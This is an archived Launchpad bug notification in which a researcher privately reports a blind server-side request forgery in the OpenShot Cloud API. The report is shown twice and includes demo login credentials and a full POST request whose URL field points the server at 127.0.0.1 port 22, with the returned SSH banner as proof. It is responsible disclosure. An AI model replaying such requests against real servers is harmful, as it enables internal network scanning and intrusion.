openshot.code team mailing list archive

Thread
Date
[Bug 2025911] [NEW] Blind Server-Side Request Forgery

To: openshot.code@xxxxxxxxxxxxxxxxxxx
From: Majed Refaea <2025911@xxxxxxxxxxxxxxxxxx>
Date: Tue, 04 Jul 2023 19:33:20 -0000
Reply-to: Bug 2025911 <2025911@xxxxxxxxxxxxxxxxxx>
Sender: noreply@xxxxxxxxxxxxx
*** This bug is a security vulnerability ***

Private security bug reported:

Hi Team!


I want to report security vulnerabilities that affect OpenShot Cloud API 


Issue: Blind Server-Side Request Forgery In the file endpoint, you can download videos, or audio files through HTTP request using python-requests/2.28.2 library,


The endpoint uses a URL parameter that takes any URL starting with the HTTP | HTTPS scheme.

After doing some research, it turns out that we can make HTTP requests
to the internal network, there is no validation, which can lead to port
scanning, and on some network infrastructures can lead to RCE.


Steps To Reproduce:


For testing, I used the cloud.openshot.org demo account


1- Login to http://cloud.openshot.org/ using demo-cloud:demo-password.
2- Now use the burp suite proxy to make the following request with your cookie


```
POST /files/ HTTP/1.1
Host: cloud.openshot.org
Content-Length: 615
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://cloud.openshot.org
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMPHzitQtkRche9nD
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://cloud.openshot.org/files/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,pt;q=0.8,ar;q=0.7
Cookie: {cookie}
Connection: close

------WebKitFormBoundaryMPHzitQtkRche9nD
Content-Disposition: form-data; name="csrfmiddlewaretoken"

12jzlmMljRVx7Tm9MsYFhy936MehafJj4J8pRGKbTFNtzEssS9dP1ccv8AbnK4AK
------WebKitFormBoundaryMPHzitQtkRche9nD
Content-Disposition: form-data; name="media"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryMPHzitQtkRche9nD
Content-Disposition: form-data; name="project"

http://cloud.openshot.org/projects/872/
------WebKitFormBoundaryMPHzitQtkRche9nD
Content-Disposition: form-data; name="json"

{"url":"http://127.0.0.1:22/"}
------WebKitFormBoundaryMPHzitQtkRche9nD--


```

Response:

SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1

** Affects: openshot
     Importance: Undecided
         Status: New

** Attachment added: "Request->response"
   https://bugs.launchpad.net/bugs/2025911/+attachment/5683896/+files/1-16.png

-- 
You received this bug notification because you are a member of OpenShot
Code, which is subscribed to OpenShot Video Editor.
Matching subscriptions: Private security bugs
https://bugs.launchpad.net/bugs/2025911

Title:
  Blind Server-Side Request Forgery

Status in OpenShot Video Editor:
  New

Bug description:
  Hi Team!

  
  I want to report security vulnerabilities that affect OpenShot Cloud API 

  
  Issue: Blind Server-Side Request Forgery In the file endpoint, you can download videos, or audio files through HTTP request using python-requests/2.28.2 library,

  
  The endpoint uses a URL parameter that takes any URL starting with the HTTP | HTTPS scheme.

  After doing some research, it turns out that we can make HTTP requests
  to the internal network, there is no validation, which can lead to
  port scanning, and on some network infrastructures can lead to RCE.

  
  Steps To Reproduce:


  For testing, I used the cloud.openshot.org demo account


  1- Login to http://cloud.openshot.org/ using demo-cloud:demo-password.
  2- Now use the burp suite proxy to make the following request with your cookie

  
  ```
  POST /files/ HTTP/1.1
  Host: cloud.openshot.org
  Content-Length: 615
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  Origin: http://cloud.openshot.org
  Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMPHzitQtkRche9nD
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Referer: http://cloud.openshot.org/files/
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9,pt;q=0.8,ar;q=0.7
  Cookie: {cookie}
  Connection: close

  ------WebKitFormBoundaryMPHzitQtkRche9nD
  Content-Disposition: form-data; name="csrfmiddlewaretoken"

  12jzlmMljRVx7Tm9MsYFhy936MehafJj4J8pRGKbTFNtzEssS9dP1ccv8AbnK4AK
  ------WebKitFormBoundaryMPHzitQtkRche9nD
  Content-Disposition: form-data; name="media"; filename=""
  Content-Type: application/octet-stream

  
  ------WebKitFormBoundaryMPHzitQtkRche9nD
  Content-Disposition: form-data; name="project"

  http://cloud.openshot.org/projects/872/
  ------WebKitFormBoundaryMPHzitQtkRche9nD
  Content-Disposition: form-data; name="json"

  {"url":"http://127.0.0.1:22/"}
  ------WebKitFormBoundaryMPHzitQtkRche9nD--

  
  ```

  Response:

  SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1

To manage notifications about this bug go to:
https://bugs.launchpad.net/openshot/+bug/2025911/+subscriptions